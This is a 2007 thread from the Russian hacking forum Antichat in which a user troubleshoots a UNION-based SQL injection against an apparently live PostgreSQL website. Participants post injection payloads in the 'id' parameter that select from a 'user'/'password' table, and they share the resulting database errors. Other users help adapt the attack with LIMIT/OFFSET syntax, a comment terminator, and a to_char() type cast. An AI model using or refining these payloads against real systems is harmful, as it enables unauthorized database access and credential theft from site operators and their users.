Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Sql (https://forum.antichat.xyz/showthread.php?t=45206)

MAAAD

24.07.2007 18:46

Sql

Код:

id=-99999+union+select+1,null,null,user,null,6,null,null+from+user+password+limit+0,1

Выводится

Query failed: ERROR: LIMIT #,# syntax is not supported HINT: Use separate LIMIT and OFFSET clauses. in /var/www/.............

Скобки фильтруются, что можно сделать?!

Scipio

24.07.2007 19:34

Не поддерживается такая маска limit`а, можно использовать только один операнд.
делай так

Код:

id=-9999+union+select+1,null,null,user,null,6,null,null+from+user+password+limit+1+offset+1/*

MAAAD

24.07.2007 19:41

Цитата:

Сообщение от Scipio

Не поддерживается такая маска limit`а, можно использовать только один операнд.
делай так

Код:

id=-9999+union+select+1,null,null,user,null,6,null,null+from+user+password+limit+1+offset+1/*

Я бы рад, но тогда сразу вылезает вот что:

Warning: pg_query() [function.pg-query]: Query failed: ERROR: UNION types integer and name cannot be matched in /var/www/

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/

Notice: Trying to get property of non-object in /var/www/

MAAAD

27.07.2007 13:05

Что сделать?!

MAAAD

27.07.2007 13:24

Ошибка запроса:Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

А с этим что сделать?!

Spyder

27.07.2007 13:48

Цитата:

Warning: pg_query() [function.pg-query]: Query failed: ERROR: UNION types integer and name cannot be matched in /var/www/

типы данных не совпадают
пробуй в другие поля вставлять

blackybr

27.07.2007 14:15

to_char()

а вообще есть статья, в которой все подробно описано

статья от spyder вроде

Время: 15:49